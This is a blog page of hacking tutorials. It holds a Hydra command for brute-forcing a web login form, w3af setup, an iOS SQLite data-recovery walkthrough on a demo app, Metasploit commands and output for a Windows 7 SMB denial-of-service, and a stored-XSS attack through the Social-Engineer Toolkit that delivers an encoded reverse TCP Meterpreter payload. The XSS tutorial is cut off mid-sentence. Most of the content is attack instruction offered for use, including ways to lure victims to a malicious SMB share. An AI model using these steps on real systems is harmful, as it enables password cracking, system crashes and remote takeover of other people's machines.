Brute-Force attack using HYDRA

<div dir="ltr" style="text-align: left;" trbidi="on"><h3 style="text-align: left;">What is BRUTE-FORCE attack ?</h3><br />A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.<br /><br /><h3 style="text-align: left;">How to install THC-hydra ?</h3><br />Open your terminal & type following command<br /><br />(1)sudo bash<br /><br />(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz<br /><br />(3)After downloading ,we are going to extract it<br /><br />tar -xvf hydra-6.3-src.tar.gz<br /><br />(4)tar -xvf hydra-6.3-src.tar.gz<br /><br />(5)./configure && make && install<br /><br />(6)make install<br /><br /><br /><h3 style="text-align: left;">How to use THC-hydra?</h3><br />If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21)<br /><br />Now in order to brute-force a specific login form you need to define the user-name (if you don't know it include a file containing some), the word-lists directory, the service attacking and form method and the page itself.<br /><br />Type following command in terminal<br /><br />hydra -l admin -P /root/pass  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnNE7GTPVhtjN2r0EOchrPiGdDZvfLDexx1Srjk6gkRluI7Tn6BLG3S9an6mZC0n4DP_Q1zWGwIkkkaC3qe7TsMDQjupQCa3s4_HPnW5-mOdpVjKg3L-yoh7iondcKsYC_Vi7mP7QGd844/s1600/hydra.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="hydra-bruteforce" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnNE7GTPVhtjN2r0EOchrPiGdDZvfLDexx1Srjk6gkRluI7Tn6BLG3S9an6mZC0n4DP_Q1zWGwIkkkaC3qe7TsMDQjupQCa3s4_HPnW5-mOdpVjKg3L-yoh7iondcKsYC_Vi7mP7QGd844/s1600/hydra.PNG" title="hydra-bruteforce" /></a></div><br />The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you don't know the login). <br /><br />The -p switch defines the password and the capital -P - the directory for the wordlists ( the -P is used almost always) <br /><br />If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp". <br /><br />Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the code. <br /><br />They could be usr,pwd etc - it's not necessarily for them to be as in most cases "username" & "password". Just view the source and make sure what their names are. <br /><br />Now there are a lot more options of Hydra. I'll explain some of them below no matter that they are included in the MAN page of hydra<br /><br />-vV - The verbose mode. This mode shows you every login attempt hydra tries. <br /><br />-s - We specify the port on which we're running our attack.<br /><br />-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.<br /><br />-R - Restores a previously aborted session of an attack.<br /><br />-e ns - Checks for blank or no password fields.<br /><br /></div>

Brute-Force attack using HYDRA

What is BRUTE-FORCE attack ? A password attack that does not attempt to decrypt any information, but continue to try different passwords. Fo...

+ Read more »

Web application and audit framework

<div dir="ltr" style="text-align: left;" trbidi="on">w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for web vulnerability assessments and penetration tests.<br /><br />Download:-<br /><br />The framework can be downloaded from the project main page:http://www.w3af.com/#download<br /><br />Installation:-<br /><br />Some of the requirements are bundled with the distribution file, in order to make<br /><br />the installation process easier for the novice user. The bundled requirements can<br /><br />be found inside the extlib directory. Most of the libraries can be run from that<br /><br />directory, but some others require an installation process, the installation steps<br /><br />for these libraries are (as root):<br /><br />cd w3af<br /><br />cd extlib<br /><br />cd fpconst­0.7.2<br /><br />python setup.py install<br /><br />cd ..<br /><br />cd SOAPpy<br /><br />python setup.py install<br /><br />cd ..<br /><br />cd pyPdf<br /><br />python setup.py install<br /><br />Running w3af:-<br /><br />w3af has two user interfaces, the console user interface (consoleUI) and the<br /><br />graphical user interface (gtkUi). To use console interface type<br /><br />./w3af_console<br /><br />w3af>>><br /><br />If you are using w3af first time then I recommended you to use graphical user interface.<br /><br />./w3af_gui<br /><br />The graphical user interface allows you to perform all the actions that the<br /><br />framework offers and features a much easier and faster way to start a scan and<br /><br />analyze the results.<br /><br />If you want to know more about plugins & console interface, here is document. You can Download it.<br /></div>

Web application and audit framework

w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for web vulnerability...

+ Read more »

iOS application security assessment: Sqlite data leakage

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1zW0Ntl-28zlWeVo1PoQKnWRdC648QE_fOapiZhz1XDG_l2b0K-k-73bKWMfMA2fjpGEA7gALn2L71MohZwhAg8i-V2SpPaxs6EZ8X86-t-XEHLIiPtI_SLbaxI_T_-5Sg9aRBw9aLww/s1600/1186846236_55c8eb1c46.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1zW0Ntl-28zlWeVo1PoQKnWRdC648QE_fOapiZhz1XDG_l2b0K-k-73bKWMfMA2fjpGEA7gALn2L71MohZwhAg8i-V2SpPaxs6EZ8X86-t-XEHLIiPtI_SLbaxI_T_-5Sg9aRBw9aLww/s640/1186846236_55c8eb1c46.jpg" width="577" /></a></div><br />Most of the iOS applications store sensitive information like usernames, passwords & transaction details, etc.. either permanently or temporarily on the iPhone to provide offline access for the user. In general, to store large and complex data, iOS applications use the Sqlite database as it offers good memory usage and speed access. For example, to provide offline access Gmail iOS application stores all the emails in a Sqlite database file in plain text format.<br /><br />Unencrypted sensitive information stored in a Sqlite file can be stolen easily upon gaining physical access to the device or the device backup. Also, if an entry is deleted, Sqlite tags the record as deleted but not purge them. So in case if an application temporarily stores and removes the sensitive data from a Sqlite file, deleted data can be recovered easily by reading the Sqlite Write Ahead Log. The below article explains on how to view Sqlite files and how to recover the deleted data from Sqlite files on the iPhone. For this exercise, I have created a demo application called CardInfo. CardInfo is a self signed application, so it can only be installed on a Jailbroken iPhone. The CardInfo demo application accepts any username & password, then collects the credit card details from the user and stores it in a Sqlite database. Database entries are deleted upon logout from the app.<br /><a name='more'></a><br /><b><b id="internal-source-marker_0.6440373538061976" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: transparent; color: #4f81bd; font-family: Cambria; font-size: 18px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: initial; vertical-align: baseline; white-space: pre-wrap;">Steps to install the CardInfo application:</span></b></b><br /><b><b id="internal-source-marker_0.6440373538061976" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: transparent; color: #4f81bd; font-family: Cambria; font-size: 18px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: initial; vertical-align: baseline; white-space: pre-wrap;"> </span></b> </b><br /><b>1. </b>Jailbreak the iPhone.<br /><br /><b>2.</b> Download<b> CardInfoDemo,ipa</b> file - <a href="http://www.securitylearn.net/public_html/wp-content/uploads/demo%20iOS%20apps/CardInfoDemo.ipa">Download link</a>.<br /><br /><b>3. </b>On the Windows, download the iPhone configuration utility – <a href="http://support.apple.com/kb/DL1466" rel="no follow">Download link</a>.<br /><br /><b>4.</b> Open the iPhone configuration utility and drag the <b>CardInfoDemo.ipa</b> file on to it.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-xLx6lz4fsVBpVFu09pUAqHdK226y6mcOYwqmWWdlcigr-n9MClzsXFUXw-GK1wDDxaO9BDaro52af9xX9tLxyzhvIsP69-jNd49FwupnioKvxTj8pJ3J2BQlF7UO9cVTN_RiHiEuV-Q/s1600/image16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-xLx6lz4fsVBpVFu09pUAqHdK226y6mcOYwqmWWdlcigr-n9MClzsXFUXw-GK1wDDxaO9BDaro52af9xX9tLxyzhvIsP69-jNd49FwupnioKvxTj8pJ3J2BQlF7UO9cVTN_RiHiEuV-Q/s640/image16.png" width="577" /></a></div><br /><b>5.</b> Connect the iPhone to the windows machine using USB cable. Notice that the connected device is listed in the iPhone configuration utility. Select the device and navigate to Applications tab. It lists the already installed applications on the iPhone along with our CardInfo demo app.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFBfq30HdT_4NsQtKwaLllk6G5UxMzpLprcZIb0lV1nloqE4cGNqJETf4lRuJNrle0NbVYyn23XdbCNup6xHcvnk5z_MSZJM8y6iS8KNRZ1iJRzsZGSi2DP8_8TcdJPtNikg-2WMs9ycI/s1600/image17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFBfq30HdT_4NsQtKwaLllk6G5UxMzpLprcZIb0lV1nloqE4cGNqJETf4lRuJNrle0NbVYyn23XdbCNup6xHcvnk5z_MSZJM8y6iS8KNRZ1iJRzsZGSi2DP8_8TcdJPtNikg-2WMs9ycI/s640/image17.png" width="577" /></a></div><br /><br /><b>6.</b> Click on Install button corresponding to the CardInfo application.<br /><br /><b>7.</b> It installs the CardInfo application on to the iPhone.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrminjx8Ow3iBGJRgYxs0BCbc25c6sl9fXDlyWekUX5A0d11sDD8P7F6I-FPQB3NPs3yPs11q3hwu0KqU2uedk8fQEiMz6a2mUrzqw0F7osHteyQCGY7rm5hoLhflmY6g5cGyR5OgthdM/s1600/image22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrminjx8Ow3iBGJRgYxs0BCbc25c6sl9fXDlyWekUX5A0d11sDD8P7F6I-FPQB3NPs3yPs11q3hwu0KqU2uedk8fQEiMz6a2mUrzqw0F7osHteyQCGY7rm5hoLhflmY6g5cGyR5OgthdM/s320/image22.png" width="213" /></a></div><br /><br />When an application is installed on the iPhone, it creates a directory with an unique identifier under <b>/var/mobile/Applications</b> directory. Everything that is required for an application to execute will be contained in the created home directory. Steps to view CardInfo Sqlite files: <b>1.</b> On the Jailbroken iPhone, install OpenSSH and Sqlite3 from Cydia.<br /><b>2.</b> On windows workstation, download Putty.<b> Connect the iPhone and the workstation to the same Wi-Fi network.<br /> </b><br /><b>Note: Wi-Fi is required to connect the iPhone over SSH. If the Wi-Fi connection is not available <a href="http://www.securitylearn.net/2012/10/11/ssh-into-iphone-over-usb-without-wi-fi/" target="_blank">SSH into the iPhone over USB</a>.</b><br /><br /><b>3. </b>Run Putty and SSH into the iPhone by typing the iPhone IP address, root as username and alpine<br />as password.<br /><br /><b>4.</b> Navigate to <b>/var/mobile/Applications/ f</b>older and identify the CardInfo application directory using<br />‘<b>find . –name CardInfo</b>’ command. On my iPhone CardInfo application is installed on the - <b>/var/<br />mobile/Application/B02A125C-B97E-4207-911B-C136B1A08687/</b> directory.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1lAPC6QCKA21vUKxu2qZYi93rUQ_c-KuGZ6cMQsZSDyYU83-XsaB68G3MsHg-YmJ9-1de-SFEduHQPoEdRc5cK25C_UAUpBJaD0mkakrE5zZFBhXCMFAGtdSWSB8aizjaANAHMtfXPHg/s1600/image13.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1lAPC6QCKA21vUKxu2qZYi93rUQ_c-KuGZ6cMQsZSDyYU83-XsaB68G3MsHg-YmJ9-1de-SFEduHQPoEdRc5cK25C_UAUpBJaD0mkakrE5zZFBhXCMFAGtdSWSB8aizjaANAHMtfXPHg/s640/image13.jpg" width="577" /></a><br /><br /><b>5.</b> Navigate to the <b>/var/mobile/Application/B02A125C-B97E-4207-911B-C136B1A08687/<br />CardInfo.app</b> directory and notice <b>CARDDATABASE.sqlite3</b> database file.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_QeDWOIk8b96aFszo8RYn2h91u83LWJtozLAjO5I4Y9j4kZyo_Gh0xWFhYXmRfKeA1tgiJC9e9fP6GqI62YE9QPw5ZSMLTA0LH9rBLXxrbS3mqMGCIYW9cF6J8ml3K4S9k6c9ny9bXKU/s1600/image21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_QeDWOIk8b96aFszo8RYn2h91u83LWJtozLAjO5I4Y9j4kZyo_Gh0xWFhYXmRfKeA1tgiJC9e9fP6GqI62YE9QPw5ZSMLTA0LH9rBLXxrbS3mqMGCIYW9cF6J8ml3K4S9k6c9ny9bXKU/s640/image21.png" width="577" /></a></div><br /><br /><b>6.</b> Sqlite database files on a Jailbroken iPhone can be viewed directly using Sqlite3 command line<br />client. View CARDDATABASE.sqlite3 and notice that CARDINFO table is empty.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiNIZ-v8R9VKrfP_ETwfwZNNPn6_Kg1sr5in3D7HfYEJlrzPRHmpIbJygsp5FIhyphenhyphen8p7h6dTBb94AUE8K9tP5YAPAX-u7sxrD5KDpn44fLE-BGgyO304-18pdlyIquisIkfG-X7RuaZxZc/s1600/image19.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiNIZ-v8R9VKrfP_ETwfwZNNPn6_Kg1sr5in3D7HfYEJlrzPRHmpIbJygsp5FIhyphenhyphen8p7h6dTBb94AUE8K9tP5YAPAX-u7sxrD5KDpn44fLE-BGgyO304-18pdlyIquisIkfG-X7RuaZxZc/s640/image19.jpg" width="577" /></a></div><br /><b>7</b>.<b> </b>On the iPhone, open CardInfo application and login (works for any username and password).<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAp94he6mShTXvKp__4yNEuMfQzHMJx4Sl956Q-JFwjoZYu8rebzpsrZkLUWR6gUblJgSQ7yleXAMvsNtW6rAKstYb_rEwGMlEcBE6DQTojqQc_TjsixNn9zneh1VfGeXYtOsh90EMpRk/s1600/image14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAp94he6mShTXvKp__4yNEuMfQzHMJx4Sl956Q-JFwjoZYu8rebzpsrZkLUWR6gUblJgSQ7yleXAMvsNtW6rAKstYb_rEwGMlEcBE6DQTojqQc_TjsixNn9zneh1VfGeXYtOsh90EMpRk/s1600/image14.png" /></a></div><b>8. </b>Enter credit card details and click on Save button. In the background, it saves the card details in<br />the Sqlite database.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicxfoZYY7ElbRZBLvJHL1DLCvN9U-mFSyKoaAAj-ga3fLYmfbP8uWjqiSLf9PmnKG6WPynFQTjsskXUL04iAyYPRPEGBTsWdHXi1NXQTksfqjp8wA_mhmbONPH_qP2apqHm6uMaTHIh1c/s1600/image18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="577" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicxfoZYY7ElbRZBLvJHL1DLCvN9U-mFSyKoaAAj-ga3fLYmfbP8uWjqiSLf9PmnKG6WPynFQTjsskXUL04iAyYPRPEGBTsWdHXi1NXQTksfqjp8wA_mhmbONPH_qP2apqHm6uMaTHIh1c/s640/image18.png" width="426" /></a></div><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYvucrxP1_Ij96n3hywyEF3Yi7DiG6nboKrL2UlKX6Um4DFfXllHbgBimDOesYXZiAp8Pv30ezdlZ3sdbe5jH7SUTMwhZLk9Mvy-7EgrSpdwYzDPCWcvgOjbB47rNt6gGZfwvPqpBE64k/s1600/image15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYvucrxP1_Ij96n3hywyEF3Yi7DiG6nboKrL2UlKX6Um4DFfXllHbgBimDOesYXZiAp8Pv30ezdlZ3sdbe5jH7SUTMwhZLk9Mvy-7EgrSpdwYzDPCWcvgOjbB47rNt6gGZfwvPqpBE64k/s1600/image15.png" /> </a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG_tEloGXgYAxTdB2fUgyah_YQqeOGlxvDLtKrV9bhYmeRNLnFPft-ouACX9-abTaxzB7DB7j7PW2ihP2lo44rx2iD1JaNnfxvaWTldsLZcDmxGdOfD6TJhUJVvSMQS6T68OunxY6IS88/s1600/image24.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG_tEloGXgYAxTdB2fUgyah_YQqeOGlxvDLtKrV9bhYmeRNLnFPft-ouACX9-abTaxzB7DB7j7PW2ihP2lo44rx2iD1JaNnfxvaWTldsLZcDmxGdOfD6TJhUJVvSMQS6T68OunxY6IS88/s640/image24.jpg" width="577" /></a><br /><br /><b><b>9.</b> </b>View CARDDATABASE.sqlite3 and notice that CARDINFO table contains the data (credit card<br />details)<b>.</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvdGATSVJaRtSAuGyFGFfaZ60dw-9imqIiCpUguvWBf1pVeQCbhDssVBZB1u2IJlhgJzJWbGIblB5iMtwI95GEVCXudlT0V3lIXTQ6Ub4IgCKY94NhGdQRRtdYDu0_in1pzkf99m6hzZY/s1600/image20.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvdGATSVJaRtSAuGyFGFfaZ60dw-9imqIiCpUguvWBf1pVeQCbhDssVBZB1u2IJlhgJzJWbGIblB5iMtwI95GEVCXudlT0V3lIXTQ6Ub4IgCKY94NhGdQRRtdYDu0_in1pzkf99m6hzZY/s640/image20.jpg" width="577" /></a></div><br /><b>10.</b> Logout from the application on the iPhone. In the background, it deletes the data from the Sqlite<br />database.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2J4VAdT0xm7ZhcErPS-mdC1WwAa33l9RH2Au0RDHyhpIDwzVpQNWhS4Cs7hG2yctHn2C-pfy78qEOdIqfsWXP2cHV6ZF3bCva-HxpAXzeqPKCgqYejhZ1Pp82o9MeeaZni-oGqaqh9VY/s1600/image23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2J4VAdT0xm7ZhcErPS-mdC1WwAa33l9RH2Au0RDHyhpIDwzVpQNWhS4Cs7hG2yctHn2C-pfy78qEOdIqfsWXP2cHV6ZF3bCva-HxpAXzeqPKCgqYejhZ1Pp82o9MeeaZni-oGqaqh9VY/s320/image23.png" width="213" /></a></div><br /><b>11</b>. Now view <b>CARDDATABASE.sqlite3</b> and notice that <b>CARDINFO </b>table is empty.<br /><b><br /></b><b>Steps to recover the deleted data from CardInfo Sqlite file:</b><br /><br />Sqlite database engine writes the data into Write Ahead Log before storing it in the actual database file, to recover from system failures. Upon every checkpoint or commit, the data in the WAL is written into the database file. So if an entry is deleted from the Sqlite database and there is no immediate commit query, we can easily recover the deleted data by reading the WAL. In case of iOS, strings command can be used  to print the deleted data from a Sqlite file. In our case, running ‘strings CARDDATABASE.sqlite3’ command prints the deleted card details.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBe_qhngt5MbJMUiBowbgwVaNc769mo-Gf2jEXgm3cPhkAD7ZWrq0D7-kUmolQqlIHaVrDa_NmsVDCiXz8POK-F9DO8Zv3EHAXAaBpASk4BPmtSP17tMTvsrJN20SQQGadoCzcmjanXHA/s1600/image25.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBe_qhngt5MbJMUiBowbgwVaNc769mo-Gf2jEXgm3cPhkAD7ZWrq0D7-kUmolQqlIHaVrDa_NmsVDCiXz8POK-F9DO8Zv3EHAXAaBpASk4BPmtSP17tMTvsrJN20SQQGadoCzcmjanXHA/s640/image25.jpg" width="577" /></a></div><br />In iOS, if an application uses the Sqlite database for temporary storage, there is always a possibility to recover the deleted temporary data from the database file. <br />For better security, use custom encryption while storing the sensitive data in Sqlite database. Also, before deleting a Sqlite record, overwrite that entry with junk data. So even if someone tries to recover the deleted data from Sqlite, they will not get the actual data. <br /><br /><b>About The Author</b><br /><br /><b>This is a guest post written by Satishb3 - <a href="http://www.securitylearn.net/">www.securitylearn.net</a>. </b></div>

iOS application security assessment: Sqlite data leakage

Most of the iOS applications store sensitive information like usernames, passwords & transaction details, etc.. either permanently or te...

+ Read more »

DOS attack on windows-7 using metasploit

<div dir="ltr" style="text-align: left;" trbidi="on"><style type="text/css"> <!-- @page { margin: 0.79in } P { margin-bottom: 0.08in } </style> <span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB  server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word </span></span></span><br /><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">document otherwise.</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)msfconsole</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(2)use dos/windows/smb/ms10_006_negotiate_response_loop</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(3)show options</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(4)set SRVHOST I.P. of local machine</span></span></span><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"> </span></span></span><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii1PZrU18U3BhanLwVHtlwpd2oIpR-PbpLW4vASl5RQQCICAHJKBF16xRfYNnsIWFXNTwGXECQN5sOgzK1A3G28YcLc94Y1LJY1jJusX9dm_pSIRvfd5l657LOrXIpJUh1zMQCDZ5g2fmU/s1600/DOS.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="dos-attack-on-window" border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii1PZrU18U3BhanLwVHtlwpd2oIpR-PbpLW4vASl5RQQCICAHJKBF16xRfYNnsIWFXNTwGXECQN5sOgzK1A3G28YcLc94Y1LJY1jJusX9dm_pSIRvfd5l657LOrXIpJUh1zMQCDZ5g2fmU/s320/DOS.jpeg" title="dos-attack-on-window" width="320" /></a></div><br /><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(5)exploit</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">[*] Starting the malicious SMB service...</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">[*] To trigger, the vulnerable client should try to access: \\I.P.\Shared\Anything</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">[*] Server started.</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: #333333;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">If the system that accessed that location is vulnerable, it will immediately freeze. To get out of that state, restart the system.</span></span></span></div><div style="font-style: normal; font-weight: normal; line-height: 0.17in; margin-bottom: 0in; orphans: 2; widows: 2;"><br /><a name='more'></a></div></div>

DOS attack on windows-7 using metasploit

This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this ...

+ Read more »

How to exploit stored xss using S.E.T?

<div dir="ltr" style="text-align: left;" trbidi="on"><style type="text/css"> <!-- @page { margin: 0.79in } P { margin-bottom: 0.08in } --> </style> <br /><div style="font-style: normal; font-weight: normal;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS.</span></span></span></div><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br />(1)First I recommended you to view <a href="http://tipstrickshack.blogspot.com/2012/10/how-to-do-xss-attack-on-website.html" target="_blank">“How to fiind xss in website?” here.</a></span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(2)Open terminal & type following code in terminal.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">sudo bash</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">cd /opt/set</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">./set </span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(3)Now select option 1 which is Social-Engineering Attacks. </span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(4)Select option 2 which is website attack vector.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(5)Select option 3which is Java Applet Attack Method.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(6)Select option 1 web -templetes<span style="font-size: medium;">.</span></span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(7)Select option 1 java Required.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(8)Now we will select payload & encoder. So we select simple Windows Reverse_TCP Meterpreter & shikata_ga_nai encoding.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream 